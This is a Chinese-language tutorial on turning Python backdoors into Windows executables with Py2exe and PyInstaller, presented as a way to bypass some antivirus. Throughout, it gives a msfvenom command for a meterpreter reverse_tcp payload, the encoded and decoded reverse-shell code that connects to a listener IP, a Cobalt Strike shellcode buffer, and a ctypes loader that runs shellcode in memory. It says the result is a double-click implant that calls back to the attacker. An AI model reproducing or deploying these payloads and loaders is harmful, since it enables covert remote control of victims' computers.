使用python中的两个方法进行打包
-
使用Py2exe将py后门转为exe
python环境准备
(1)安装Python 2.7 x86 windows版:
https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
*注意:必须使用x86版本Python 2.7。 即使Windows是x64的,也要安装32位版本。 并且将python.exe添加到环境变量。(2)安装32位Py2exe for python 2.7
https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download在当前文件夹中创建一个setup.py文件,该文件是利用Py2exe 将py转为exe
#! /usr/bin/env python # encoding:utf-8 from distutils.core import setup import py2exe setup( name = "Meter", description = "Python-based App", version = "1.0", console = ["test.py"], options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}}, zipfile = None )
test.py的内容为msfvenom生成
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f raw -o /tmp/test.py
生成的内容如下
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjAuMTMxJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg=='))) 解码后为: import socket,struct,time for x in range(10): try: s=socket.socket(2,socket.SOCK_STREAM) s.connect(('192.168.20.131',4444)) break except: time.sleep(5) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)<l: d+=s.recv(l-len(d)) exec(d,{'s':s})
name、 description 、version是可选项
console = [“test.py”] 表示生成控制台程序 可bypass 某些AV将test.py和setup.py 两个文件放到同一目录下
执行下面命令,即会在dist 目录下生成test.exe
生成的exe如下:
双击上线msf
-
PyInstaller将py转为exe
python环境准备:
pyinstaller同样可以将.py程序打包成windows下可以执行的exe文件;pyinstaller依赖于pywin32,在使用pyinstaller之前,应先安装(1)pywin32(python2.7版本的32位)下一步即可。
[https://github.com/mhammond/pywin32/releases]:
(2)pyinstaller 下载后,解压,不用安装,即可使用(我使用的为3.0版本)
[https://github.com/pyinstaller/pyinstaller/releases]:
(3)使用cs生成的py_payload进行加载
cs_payload如下:
buf = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x66\x58\x58\x46\x00\x95\x9c\xc1\xd6\xd0\x87\x49\x94\x17\x39\x97\xde\x5f\x2d\x80\xe8\xeb\xa5\x97\xb8\x05\xdd\xb5\x71\x7f\x20\x14\x82\xa3\xae\x3c\x99\xfc\x36\x0d\x8a\x3b\xd3\xbe\xaa\x1b\xe4\x46\xbb\xd0\x0a\xbe\x19\x44\xd9\x04\x07\x6b\xd1\x6a\xdf\xc9\x56\xc1\xa8\xbe\xbd\x0c\x59\x06\xc3\xdb\x69\xcc\xb4\x7a\x71\xb3\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\x35\xc3\xb3\x34\x1c\x10\x37\x4d\x32\x02\xee\xdf\x3a\xeb\x3d\x50\x10\xd6\xef\xfb\xb5\xc8\x51\xa9\x11\xee\xaa\xe4\x91\x1a\xf9\x52\x97\x5a\xd9\x36\xae\xc9\x1d\xf9\x0e\x15\xc5\x52\x7d\x3b\xaa\x1b\x0a\xcb\xf8\x60\x84\xcd\xec\x69\x3d\x08\xe0\x4a\x0c\xf2\xb0\x30\x00\x1f\xdc\x22\x4d\x67\x41\x9c\xdc\xaa\x25\x2b\x74\xb3\x30\x4e\x88\x4e\x08\x98\x36\xe2\x40\x6f\xf3\xf7\xd6\xc7\x6c\xf6\xc7\xc3\xa8\x8c\x7f\x80\xea\x99\x44\x86\x80\x7f\xc7\x58\x35\xdf\xe9\xe8\x1b\xa9\xb0\x0f\xaa\x80\x53\xf1\x30\x05\x7f\xb7\xc3\xd7\x2b\xc7\xe3\x66\xb6\xfd\xd7\x60\x67\x4d\x46\xc0\x8b\x6b\xe7\xd6\x0a\xb3\xfd\x99\xe3\x6c\x13\xaa\x17\xdf\xf7\x80\x9b\xab\xf9\x31\xc9\xa1\xe6\x13\x5b\x4b\x72\x10\x5f\xe9\x2d\x5e\x9b\x2b\x46\x50\x35\x35\x02\xe6\x5f\x40\x90\xab\xc8\x5d\x8c\x82\xa2\x2f\xfa\xf5\x8e\x22\x69\x4a\x61\xeb\x4d\x88\x6d\x6f\x99\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x32\x33\x2e\x35\x37\x2e\x31\x39\x31\x2e\x31\x35\x39\x00\x6f\xaa\x51\xc3"
shellcode加载器by_pass.py如下
#! /usr/bin/env python
# encoding:utf-8
import ctypes
def execute():
# Bind shell
shellcode = bytearray(
"\xbe\x24\x6e\x0c\x71\xda\xc8\xd9\x74\x24\xf4\x5b\x29"
"\xc9\xb1\x99\x31\x73\x15\x03\x73\x15\x83\xeb\xfc\xe2"
……………………省略一部分…………………………
"\xd1\xb4\xdb\xa8\x6d\x6d\x10\x17\x33\xf9\x2c\x93\x2b"
"\x0b\xcb\x94\x1a\xd9\xfd\xc7\x78\x26\xb3\x57\xea\x6d"
"\x37\xa5\x48\xea\x47\xf6\x81\x90\x07\xc6\x62\x9a\x56"
"\x13"
)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),
ctypes.c_int(-1))
if __name__ == "__main__":
execute()
将by_pass.by文件放入pyinstaller目录下运行
py -2 pyinstaller.py -F -w bypass_py.py
该目录下会生成by_pass文件,文件中的dist文件中则生成exe文件
双击运行,上线cobaltstrike。